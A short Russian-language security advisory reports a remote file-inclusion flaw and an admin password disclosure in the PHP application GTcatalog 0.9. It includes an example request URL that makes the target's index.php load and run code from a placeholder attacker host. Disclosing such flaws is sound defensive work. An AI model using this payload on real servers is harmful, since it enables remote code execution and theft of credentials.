Security Lab

Выполнение произвольного кода в 'gtcatalog'

Дата публикации:06.03.2003
Дата изменения:17.10.2006
Всего просмотров:3120
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Раскрытие важных данных
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: GTcatalog 0.x
Описание: Уязвимость включения файла обнаружена в 'gtcatalog'. Удаленный пользователь может выполнить произвольные команды на уязвимом сервере. Также удаленный пользователь может раскрыть пароль администратора системы.

Frog-m@n сообщил, что удаленный пользователь может загрузить 'password.inc' файл, который содержит пароль администратора системы в $$globalpw переменной.

Также сообщается, что сценарий index.php включает *.custom.inc файл, используя переменную '$custom', но не проверяет правильность включаемого файла. Удаленный пользователь может определить удаленное местоположение для *.custom.inc файла, который будет включен и выполнен целевым сервером. Пример:

http://[target]/index.php?function=custom&custom=http://[attacker]/1
где http://[attacker]/1.custom.inc
Уязвимость обнаружена в 'gtcatalog' 0.9
Ссылки: GtCatalog Bug